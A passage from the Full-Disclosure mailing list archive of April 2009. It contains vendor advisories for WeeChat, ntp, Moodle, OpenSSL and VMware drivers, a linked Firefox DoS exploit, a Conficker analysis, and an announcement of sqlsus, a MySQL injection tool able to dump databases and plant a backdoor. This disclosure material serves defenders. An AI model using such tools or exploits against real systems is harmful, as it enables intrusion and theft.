- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: WeeChat: Denial of Service
      Date: April 04, 2009
      Bugs: #262997
        ID: 200904-04

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A processing error in WeeChat might lead to a Denial of Service.

Background
==========

Wee Enhanced Environment for Chat (WeeChat) is a light and extensible
console IRC client.

Affected packages
=================

    -------------------------------------------------------------------
     Package          /  Vulnerable  /                      Unaffected
    -------------------------------------------------------------------
  1  net-irc/weechat      < 0.2.6.1                         >= 0.2.6.1

Description
===========

Sebastien Helleu reported an array out-of-bounds error in the colored
message handling.

Impact
======

A remote attacker could send a specially crafted PRIVMSG command,
possibly leading to a Denial of Service (application crash).

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All WeeChat users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-irc/weechat-0.2.6.1"

References
==========

  [ 1 ] CVE-2009-0661
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0661

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200904-04.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 198 bytes
Desc: OpenPGP digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090404/a38097a5/attachment.bin 

From pschmehl_lists at tx.rr.com  Sat Apr  4 20:27:42 2009
From: pschmehl_lists at tx.rr.com (Paul Schmehl)
Date: Sat, 04 Apr 2009 14:27:42 -0500
Subject: [Full-disclosure] Firefox 3.0.8 remote DoS: 0-day exploit
In-Reply-To: <bc7e11f20904040539u30ce8279t9752bad68840c933@mail.gmail.com>
References: <bc7e11f20904040539u30ce8279t9752bad68840c933@mail.gmail.com>
Message-ID: <12DA506E26EDEA8B5457E9E4@Macintosh-2.local>

--On April 4, 2009 2:39:40 PM +0200 carl hardwick 
<hardwick.carl at gmail.com> wrote:

> I found an unpatched vulnerability in the latest Firefox 3.0.8 allows
> a remote attacker to cause a DoS.
> A 0-day exploit is available here:
> http://carl-hardwick.googlegroups.com/web/Firefox+3.0.8+DoS.htm?gda=i_oP
> fkcAAACkS-ZCh60y1HGkG90OfxntdaCvR5MIFXIiKOQt5O80jPqLKEFpBrbag3mOAa49_d8x
> nmtLTzx06f-L8nRUL3egeV4duv6pDMGhhhZdjQlNAw&gsc=HORKjwsAAAA1umYfXMbeoe6wr
> 8IrMRRv
>

Works on Mac OS 10.5.6 with Firefox 3.0.8.


Paul Schmehl, If it isn't already
obvious, my opinions are my own
and not those of my employer.
******************************************
WARNING: Check the headers before replying



From nion at debian.org  Fri Apr  3 14:35:39 2009
From: nion at debian.org (Nico Golde)
Date: Fri, 3 Apr 2009 15:35:39 +0200
Subject: [Full-disclosure] [SECURITY] [DSA 1761-1] New moodle packages fix
	file disclosure
Message-ID: <20090403133539.GA6261@ngolde.de>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA-1761-1                    security at debian.org
http://www.debian.org/security/                                 Nico Golde
April 3rd, 2009                         http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : moodle
Vulnerability  : missing input sanitization
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2009-1171
Debian Bug     : 522116


Christian J. Eibl discovered that the TeX filter of Moodle, a web-based
course management system, doesn't check user input for certain TeX commands
which allows an attacker to include and display the content of arbitrary system
files.

Note that this doesn't affect installations that only use the mimetex
environment.

For the oldstable distribution (etch), this problem has been fixed in
version 1.6.3-2+etch3.

For the stable distribution (lenny), this problem has been fixed in
version 1.8.2.dfsg-3+lenny2.

For the testing distribution (squeeze), this problem will be fixed soon.

For the unstable distribution (sid), this problem has been fixed in
version 1.8.2.dfsg-5.


We recommend that you upgrade your moodle packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Debian (oldstable)
- ------------------

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/m/moodle/moodle_1.6.3-2+etch3.dsc
    Size/MD5 checksum:      793 bb2ea87c38661c49b936a357eeb14b0c
  http://security.debian.org/pool/updates/main/m/moodle/moodle_1.6.3-2+etch3.diff.gz
    Size/MD5 checksum:    27511 974a829196380027ac19e82ecd4a6e82

Architecture independent packages:

  http://security.debian.org/pool/updates/main/m/moodle/moodle_1.6.3-2+etch3_all.deb
    Size/MD5 checksum:  6583190 7d5c0c3103021541b308f54bfc2e2d55


Debian GNU/Linux 5.0 alias lenny
- --------------------------------

Debian (stable)
- ---------------

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/m/moodle/moodle_1.8.2.dfsg-3+lenny2.diff.gz
    Size/MD5 checksum:    49345 31b07d8aab91762d31e2f73dcc6a468c
  http://security.debian.org/pool/updates/main/m/moodle/moodle_1.8.2.dfsg-3+lenny2.dsc
    Size/MD5 checksum:     1390 e7a4b2fe58e3b53f6c4bf6327a007509

Architecture independent packages:

  http://security.debian.org/pool/updates/main/m/moodle/moodle_1.8.2.dfsg-3+lenny2_all.deb
    Size/MD5 checksum:  8713446 6a9345748982edab6a52047abe6779f6


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAknWEKsACgkQHYflSXNkfP8dGQCfTBLt9yBJwXeP3DycLWtgcDVQ
j3cAn3DJJ7RaJFocrI0532MZa/09ziQL
=JjDY
-----END PGP SIGNATURE-----



From nick58 at gmail.com  Sun Apr  5 03:10:31 2009
From: nick58 at gmail.com (Nick)
Date: Sat, 4 Apr 2009 20:10:31 -0600
Subject: [Full-disclosure] Firefox 3.0.8 remote DoS: 0-day exploit
Message-ID: <b4399fb70904041910qe4b2503mdf5f0c0b0c0af3b1@mail.gmail.com>

This has already been posted on Firefox's bugzilla (
https://bugzilla.mozilla.org/show_bug.cgi?id=456727) and there is another
bug like this one that causes firefox to hang (
https://bugzilla.mozilla.org/show_bug.cgi?id=348033). The 0day exploit/bug
is fixed and its been committed to the CVS and will be released with
3.0.9...
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090404/8774224b/attachment.html 

From extraexploit at gmail.com  Sun Apr  5 14:09:48 2009
From: extraexploit at gmail.com (exploit dev)
Date: Sun, 5 Apr 2009 15:09:48 +0200
Subject: [Full-disclosure] conficker.c - ccTLD strange attractor
Message-ID: <ed6983ac0904050609j7805b19bx2228a020c04a6e08@mail.gmail.com>

I have publish a smart analysis about the first 20days of April 2009
ccTLD (country code top level domain) generated by the algorithm used
by worm for pseudo random domain name generation.
The following chart show the frequency for each ccTLD. I discovered a
sort of attractor for some ccTLD such as AG, BO, LC, HN,LC, PE, and
TW. A singular point is for DJ ccTLD domain. For more information
http://extraexploit.blogspot.com. This kind of analysis I think and
that is useful for get evidence as indicator of conficker.c activities
inside your corporate network.

Feedback are well come.

Regards



From py at gentoo.org  Sun Apr  5 14:56:49 2009
From: py at gentoo.org (Pierre-Yves Rofes)
Date: Sun, 05 Apr 2009 15:56:49 +0200
Subject: [Full-disclosure] [ GLSA 200904-05 ] ntp: Certificate validation
	error
Message-ID: <49D8B8A1.1070204@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200904-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: ntp: Certificate validation error
      Date: April 05, 2009
      Bugs: #254098
        ID: 200904-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

An error in the OpenSSL certificate chain validation in ntp might allow
for spoofing attacks.

Background
==========

ntp contains the client and daemon implementations for the Network Time
Protocol.

Affected packages
=================

    -------------------------------------------------------------------
     Package       /  Vulnerable  /                         Unaffected
    -------------------------------------------------------------------
  1  net-misc/ntp     < 4.2.4_p6                           >= 4.2.4_p6

Description
===========

It has been reported that ntp incorrectly checks the return value of
the EVP_VerifyFinal(), a vulnerability related to CVE-2008-5077 (GLSA
200902-02).

Impact
======

A remote attacker could exploit this vulnerability to spoof arbitrary
names to conduct Man-In-The-Middle attacks and intercept sensitive
information.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All ntp users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-misc/ntp-4.2.4_p6"

References
==========

  [ 1 ] CVE-2008-5077
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5077
  [ 2 ] CVE-2009-0021
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0021
  [ 3 ] GLSA 200902-02
        http://www.gentoo.org/security/en/glsa/glsa-200902-02.xml

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200904-05.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 261 bytes
Desc: OpenPGP digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090405/78587cfd/attachment.bin 

From sativouf at gmail.com  Mon Apr  6 01:10:47 2009
From: sativouf at gmail.com (sativouf)
Date: Mon, 6 Apr 2009 02:10:47 +0200
Subject: [Full-disclosure] [tool] sqlsus 0.3 released !
Message-ID: <68e0c7e0904051710g17fb5cbbif846fb35eaf5a9e@mail.gmail.com>

Hi everyone,

A new version of sqlsus has been released and is available at
http://sqlsus.sf.net/
You will find on the website a description of the features, along with
some documentation and flash demos showing how the tool can be used.

sqlsus is a MySQL injection and takeover tool, written in perl.
Via a command line interface that mimics a mysql console, you can
retrieve the database structure / contents,  inject a SQL query,
download files from the web server, upload and control a backdoor, and
much more...
It is designed to maximize the amount of data gathered per web server
hit, making the best use (I can think of) of MySQL functions to
optimize the available injection space.
sqlsus is focused on PHP/MySQL installations, and integrates some neat
features, some of which are really specific to this DBMS.


What's new
==========

- Full SQLite backend, storing queries / results as they come,
databases structure, variables... into a local SQLite database.
- Added "clone" command to clone some columns, a table, or the full
database into a local SQLite database.
- "clone" has a resume ability, allowing to continue accross sessions.
- Rewrite of the blind injection engine (A LOT faster now):
   - keep all the threads busy with micro tasks (huge speed improvement)
   - regular expression matching for each item, prior to bruteforcing
(huge drop in the number of hits required)
   - progress meter
- Added cookie support.
- Possibility to change the current database ("use xxxx"), and still
be able to use all the commands transparently
- Better query shortening, allowing even more data to be fetched per server hit.
- Got rid of IPC::Shareable, using socketpair() instead.
- Use of BINARY for inband injections, to avoid collation issues.
- Inband injection is now only contained in subqueries, to allow more
complex sql injection scenarios.
...

The full CHANGELOG can be found in the tarball or at
http://sqlsus.sf.net/download.html


Download and enjoy :)


- sativouf



From flame at hushmail.com  Mon Apr  6 14:22:35 2009
From: flame at hushmail.com (Answer)
Date: Mon, 06 Apr 2009 15:22:35 +0200
Subject: [Full-disclosure] News paper article > who is the greatest Hacker?
Message-ID: <49DA021B.5080704@hushmail.com>

Hello all - please excuse the off-topic ride.

I need for a NP article a list of top-five actual hackers ( I mean Hacker, not security expert ;)).
A sort of wall of fame, only screen name.
Would one be kind enough to make replie directly to my mailbox, to limit
the list pollution?

Thanks.



From tecklord at securitylab.ru  Mon Apr  6 15:10:52 2009
From: tecklord at securitylab.ru (Valery Marchuk)
Date: Mon, 6 Apr 2009 17:10:52 +0300
Subject: [Full-disclosure] [Positive Technologies SA 2008-05] VMware
	Multiple Products vmci.sys Privilege Escalation Vulnerability
Message-ID: <CF84C2F7DC534E1B87EAD5543AAE3150@srvsp1>

----------------------------------------------------------------------
         (PT-2008-05) Positive Technologies Security Advisory
 VMware Multiple Products vmci.sys Privilege Escalation Vulnerability
----------------------------------------------------------------------

---[ Affected Software ]

        VMware
               Workstation 6.0.x, 6.5.x
                Player 2.0.x, 2.5.x
                ACE 2.0.x
                Server 2.x

        Product Link:
               http://www.vmware.com

---[ Severity Rating ]

        Severity:       Medium
        Impact:         Priviliege Escalation
        Attack Vector:  Local

        CVSS v2:
               Base Score:     6.6
               Temporal Score: 5.2
               Vector:         (AV:L/AC:M/Au:S/C:C/I:C/A:C/E:P/RL:O/RC:C)

        CVE:   CVE-2009-1147

---[ Vulnerability Description ]

Positive Technologies Research Team has discovered priviliege escalation 
vulnerabilities in VMware products.

Buffer overflow vulnerability exists in vmci.sys driver. Local user with 
administrative privileges can execute arbitrary code with SYSTEM privileges.

---[ Solution ]

Update to the latest product version: vmware.com.

    Workstation    6.5.x     Windows  6.5.2 build 156735 or later
    Workstation    6.0.x     Windows  upgrade to at least 6.5.2

    Player         2.5.x     Windows  2.5.2 build 156735 or later
    Player         2.0.x     Windows  upgrade to at least 2.5.2

    ACE            2.5.x     Windows  2.5.2 build 156735 or later
    ACE            2.0.x     Windows  upgrade to at least 2.5.2

    Server         2.x       Windows  2.0.1 build 156745 or later

    Refer to VMware KB article 1009826 on the steps that are needed to
    remediate this vulnerability on Windows-based hosts. This KB article
    is found at http://kb.vmware.com/kb/1009826.


---[ Disclosure Timeline ]

10.14.2008 - Vendor notified
10.16.2008 - Vendor replied
10.16.2008 - Sent detailed information
04.03.2009 - Vendor released fixed versions
04.06.2009 - Public disclosure

---[ Credits ]

This vulnerability was discovered by Nikita Tarakanov, Positive Technologies 
Research Team.


---[ References ]

http://en.securitylab.ru/lab/PT-2008-05
http://www.ptsecurity.ru/advisory.asp

Complete list of vulnerability reports published by Positive Technologies 
Research Team:

http://en.securitylab.ru/lab/
http://www.ptsecurity.ru/advisory.asp

---[ About Positive Technologies ]

Positive Technologies www.ptsecurity.com is among the key players in the IT 
security market in Russia.
The principal activities of the company include the development of 
integrated tools for information security monitoring (MaxPatrol); providing 
IT security consulting services and technical support; the development of 
the Securitylab en.securitylab.ru leading Russian information security 
portal.

Among the clients of Positive Technologies there are more than 40 state 
enterprises, more than 50 banks and financial organizations, 20 
telecommunication companies, more than 40 plant facilities, as well as IT, 
service and retail companies from Russia, CIS countries, Baltic States, 
China, Ecuador, Germany, Great Britain, Holland, Iran, Israel, Japan, 
Mexico, South African Republic, Thailand, Turkey and USA.

Positive Technologies is a team of highly skilled developers, advisers and 
experts with years of vast hands-on experience. The company specialists 
possess professional titles and certificates; they are the members of 
various international societies and are actively involved in the IT security 
field development. 



From tecklord at securitylab.ru  Mon Apr  6 15:34:24 2009
From: tecklord at securitylab.ru (Valery Marchuk)
Date: Mon, 6 Apr 2009 17:34:24 +0300
Subject: [Full-disclosure] [Positive Technologies SA 2008-07] VMware
	Multiple Products hcmon.sys Denial of Service Vulnerability
Message-ID: <BF963B90E558487D9D219D503C60238D@srvsp1>

----------------------------------------------------------------------
         (PT-2008-07) Positive Technologies Security Advisory
 VMware Multiple Products hcmon.sys Denial of Service Vulnerability
----------------------------------------------------------------------

---[ Affected Software ]

VMware Workstation 6.0.x, 6.5.x
VMware Player 2.0.x, 2.5.x
VMware ACE 2.0.x
VMware Server 2.x

Product Link:
    http://www.vmware.com


---[ Severity Rating ]

        Severity:       Medium
        Impact:         Denial of Service
        Attack Vector:  Local

        CVSS v2:
               Base Score:     4.4
               Temporal Score: 3.4
               Vector:         (AV:L/AC:M/Au:S/C:N/I:N/A:C/E:P/RL:O/RC:C)

        CVE:   CVE-2009-1146


---[ Vulnerability Description ]

Positive Technologies Research Team has discovered denial of service 
vulnerabilities in VMware products.

The IOCTL handler in hcmon.sys does not properly validate buffer data 
associated with the Irp object, which allows local users with administrative 
priviligies to crash the system.


---[ Solution ]

Update to the latest product version: vmware.com.

    Workstation    6.5.x     Windows  6.5.2 build 156735 or later
    Workstation    6.0.x     Windows  upgrade to at least 6.5.2

    Player         2.5.x     Windows  2.5.2 build 156735 or later
    Player         2.0.x     Windows  upgrade to at least 2.5.2

    ACE            2.5.x     Windows  2.5.2 build 156735 or later
    ACE            2.0.x     Windows  upgrade to at least 2.5.2

    Server         2.x       Windows  2.0.1 build 156745 or later


---[ Disclosure Timeline ]

10.14.2008 - Vendor notified
10.16.2008 - Vendor replied
10.16.2008 - Sent detailed information
03.31.2009 - Vendor released fixed versions
04.06.2009 - Public disclosure

---[ Credits ]

This vulnerability was discovered by Nikita Tarakanov, Positive Technologies 
Research Team.

---[ References ]

http://en.securitylab.ru/lab/PT-2008-07
http://www.ptsecurity.ru/advisory.asp

Complete list of vulnerability reports published by Positive Technologies 
Research Team:

http://en.securitylab.ru/lab/
http://www.ptsecurity.ru/advisory.asp


---[ About Positive Technologies ]

Positive Technologies www.ptsecurity.com is among the key players in the IT 
security market in Russia.
The principal activities of the company include the development of 
integrated tools for information security monitoring (MaxPatrol); providing 
IT security consulting services and technical support; the development of 
the Securitylab en.securitylab.ru leading Russian information security 
portal.

Among the clients of Positive Technologies there are more than 40 state 
enterprises, more than 50 banks and financial organizations, 20 
telecommunication companies, more than 40 plant facilities, as well as IT, 
service and retail companies from Russia, CIS countries, Baltic States, 
China, Ecuador, Germany, Great Britain, Holland, Iran, Israel, Japan, 
Mexico, South African Republic, Thailand, Turkey and USA.

Positive Technologies is a team of highly skilled developers, advisers and 
experts with years of vast hands-on experience. The company specialists 
possess professional titles and certificates; they are the members of 
various international societies and are actively involved in the IT security 
field development. 



From jmm at debian.org  Mon Apr  6 17:25:35 2009
From: jmm at debian.org (Moritz Muehlenhoff)
Date: Mon, 6 Apr 2009 18:25:35 +0200
Subject: [Full-disclosure] [SECURITY] [DSA 1763-1] New openssl packages fix
	denial of service
Message-ID: <20090406162535.GA5871@galadriel.inutil.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1763-1                  security at debian.org
http://www.debian.org/security/                       Moritz Muehlenhoff
April 06, 2009                        http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : openssl
Vulnerability  : programming error
Problem type   : local(remote)
Debian-specific: no
CVE Id(s)      : CVE-2009-0590

It was discovered that insufficient length validations in the ASN.1
handling of the OpenSSL crypto library may lead to denial of service
when processing a manipulated certificate.

For the old stable distribution (etch), this problem has been fixed in
version 0.9.8c-4etch5 of the openssl package and in version
0.9.7k-3.1etch3 of the openssl097 package.

For the stable distribution (lenny), this problem has been fixed in
version 0.9.8g-15+lenny1.

For the unstable distribution (sid), this problem has been fixed in
version 0.9.8g-16.

We recommend that you upgrade your openssl packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch5.diff.gz
    Size/MD5 checksum:    57522 e91c772dc52507ae188e315d6c23f417
  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c.orig.tar.gz
    Size/MD5 checksum:  3313857 78454bec556bcb4c45129428a766c886
  http://security.debian.org/pool/updates/main/o/openssl097/openssl097_0.9.7k-3.1etch3.dsc
    Size/MD5 checksum:      777 334d05a51fff104d153daacbb815cacf
  http://security.debian.org/pool/updates/main/o/openssl097/openssl097_0.9.7k-3.1etch3.diff.gz
    Size/MD5 checksum:    35385 96ab5825d00d34b39d5582a192a164f1
  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch5.dsc
    Size/MD5 checksum:      815 94b8be7fe51bf1b44a6139e67794eaaa
  http://security.debian.org/pool/updates/main/o/openssl097/openssl097_0.9.7k.orig.tar.gz
    Size/MD5 checksum:  3292692 be6bba1d67b26eabb48cf1774925416f

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch5_alpha.deb
    Size/MD5 checksum:  2556248 b9e1c614f55f47df00d19a67ea883970
  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch3_alpha.deb
    Size/MD5 checksum:  2207186 54020d72b2b6bda696b1954f2cee2fe5
  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch5_alpha.udeb
    Size/MD5 checksum:   677170 f9b1db70bcabf8791fa5bcfb0d791718
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch5_alpha.deb
    Size/MD5 checksum:  4560596 5ac21cb15e9caa1bff002b265858fe9d
  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch5_alpha.deb
    Size/MD5 checksum:  1014956 f92c89b7b15f33f39134cac6951dc6e5
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch5_alpha.deb
    Size/MD5 checksum:  2622860 3fba6ede4fa65b807863659c31ab59f1
  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch3_alpha.deb
    Size/MD5 checksum:  3821220 7dc619d44f2697cba302bb833b6a76f0

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch3_amd64.deb
    Size/MD5 checksum:   755134 cdebe8fd9ece447cc34f61922adf1654
  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch5_amd64.deb
    Size/MD5 checksum:  1017566 c801470c6c894669543a54082146c790
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch5_amd64.deb
    Size/MD5 checksum:   891472 92f047d8e034ab564cea8a60ac1beee7
  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch5_amd64.deb
    Size/MD5 checksum:  2187560 15512947ee287be778abde9c58149502
  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch3_amd64.deb
    Size/MD5 checksum:  1328694 5e59b6cbcbb6a0c99c76de778ad59ef2
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch5_amd64.deb
    Size/MD5 checksum:  1655376 5cb373868504d83f36c8e0b00d326bc4
  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch5_amd64.udeb
    Size/MD5 checksum:   580288 784b1606bbfd8578e19aac3176aee48e

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch5_arm.deb
    Size/MD5 checksum:   806170 2f788b112acf9b4278558617beb0fc39
  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch5_arm.deb
    Size/MD5 checksum:  2050292 5ad28378161a54418c58dbc91e3ccd68
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch5_arm.deb
    Size/MD5 checksum:  1537684 2cbf49a20901aff3e29a5eeba233c649
  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch3_arm.deb
    Size/MD5 checksum:   672566 ce12740940622b7bd40e6b1b15b1a23e
  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch5_arm.udeb
    Size/MD5 checksum:   516598 5e1dc375946a1118fe7b15a4b5217148
  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch3_arm.deb
    Size/MD5 checksum:  1230132 32da60e936f1a50032e63912360e8763
  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch5_arm.deb
    Size/MD5 checksum:  1011870 fcbe95d5ba0cc8dc799ccc88d1059ca5

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch5_hppa.udeb
    Size/MD5 checksum:   631452 266ec214d92305797dca506a1df25f8e
  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch3_hppa.deb
    Size/MD5 checksum:   793976 d6da010413cf8e27d36c91e14f055460
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch5_hppa.deb
    Size/MD5 checksum:   945882 b9f0eb4d7dcbc57596d295eb56810625
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch5_hppa.deb
    Size/MD5 checksum:  1585590 44c2ccc1a104a10c4db9644c6f036b9a
  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch5_hppa.deb
    Size/MD5 checksum:  1031040 ec9c4869f0a06fe63baa52c054a971a6
  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch5_hppa.deb
    Size/MD5 checksum:  2254388 879e2f8baa2747ed8a5d991e5fbec5cc
  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch3_hppa.deb
    Size/MD5 checksum:  1275668 73252b89ec2a4b5a3f596cbbf9876f16

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch5_i386.udeb
    Size/MD5 checksum:   554790 5c94683e1237dfcbc446773e3d8d0dcc
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch5_i386.deb
    Size/MD5 checksum:  2721394 67f75b950e9b7f8beeff31a23407408f
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch5_i386.deb
    Size/MD5 checksum:  5582922 519341a170b6d7fdf6cb7aac2a072f46
  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch5_i386.deb
    Size/MD5 checksum:  1015578 35cb0399c35c86148c33842bfddf3acf
  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch3_i386.deb
    Size/MD5 checksum:  4646432 d0193de8805c7a1b6f0d4dd31289e8fd
  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch3_i386.deb
    Size/MD5 checksum:  2285960 0226330eb863fbb94601ffc3d1b86323
  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch5_i386.deb
    Size/MD5 checksum:  2094428 50eaf1853c99ffa76849ea4e90559d83

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch5_ia64.deb
    Size/MD5 checksum:  1192404 1a7e58c871bdeca29a46f91b3f16f3d6
  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch3_ia64.deb
    Size/MD5 checksum:  1010190 e77481271fe8079ed49c767b6445c359
  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch3_ia64.deb
    Size/MD5 checksum:  1263694 9a03f8a3239870e0e8844b7a8b0bcf3c
  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch5_ia64.deb
    Size/MD5 checksum:  1071288 2a36193927c00deea9cdfab7199c9f9e
  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch5_ia64.udeb
    Size/MD5 checksum:   801724 86871d922842431af08eaff99b548498
  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch5_ia64.deb
    Size/MD5 checksum:  1569640 60ae3928f73f9d324921d9eea34154a0
  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch5_ia64.deb
    Size/MD5 checksum:  2593780 c994a75eaf4607db1b1651eef80842c2

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch5_mips.deb
    Size/MD5 checksum:  1693534 8e572db0b02c6b61680c92cfb8709a83
  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch5_mips.deb
    Size/MD5 checksum:  1003920 e45135d370638131c9674cedcf58d971
